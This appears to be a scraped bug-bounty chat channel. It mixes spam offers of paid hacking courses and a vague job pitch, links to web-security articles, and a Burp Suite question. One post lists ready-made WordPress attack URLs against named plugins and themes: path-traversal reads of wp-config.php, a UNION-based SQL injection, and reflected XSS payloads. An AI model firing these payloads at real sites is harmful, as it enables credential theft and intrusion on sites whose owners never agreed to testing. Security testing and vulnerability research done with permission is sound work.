I'm from Avitorgod Gaming Platform, we are currently looking for a long time agent who will work with us. We will give you a big salary .. If you interested , I will explain to you ..
Читать полностью…Iam providing complete ethical hacking and Cybersecurity course for beginners in zoom or Google meet for low cost
Moto: beginner to hacker
so kindly DM to register
hi guys, I wrote a blog for beginners to learn SSTI. You can support meryemddalgali/websec-ssti-server-site-template-injection-1a9603caa51e" rel="nofollow">https://medium.com/@meryemddalgali/websec-ssti-server-site-template-injection-1a9603caa51e
Читать полностью…Guys this course is worth 15000 but we are providing for INR 1800 only if anyone interested kindly tell me
Читать полностью…Small question on burpsuite im doing a bug bounty and I added some payloads on the get request and cookies including headers I tested each individually and all 200 OK on the response but when u search on the response it's not reflecting I tried others some were 403 and some went on 200 but what could be the issue including I'm using burpsuite community edition
Читать полностью…Guys anyone suggest me tools
For big bounty
What tool have to use for finding apps bugs
🚀 Just dropped a new blog on how I bypassed an Admin Panel using SQL injection! If you're into web security, you'll want to check this out. 🔐
👉 link.medium.com/UAtzVzdkqMb
Hi guys, I continue to write articles on websec in medium. In this article, I wrote about CSRF. Enjoy your reading. meryemddalgali/websec-csrf-xsrf-cross-site-request-forgery-6c048c6323d1" rel="nofollow">https://medium.com/@meryemddalgali/websec-csrf-xsrf-cross-site-request-forgery-6c048c6323d1
Читать полностью…Wordpress Endpoints to look - Part 1
check this if you have Wordpress (plugins).
/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
/wp-content/uploads/adminer.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php
/wp-content/plugins/wp-phpmyadmin/wp-phpmyadmin/phpmyadmin/
/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=-1+union+select+1,2,3,4,concat(0x7e7e7e,74657374,0x7c7c7c,md5(74657374),0x7e7e7e),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+--
/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes
/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
Upload to the root directory of your site the readme.txt file that contains “Bug bounty chat” to confirm that this is your site.
And only after that discount the link to your site. Otherwise your post will be deleted and you will be blocked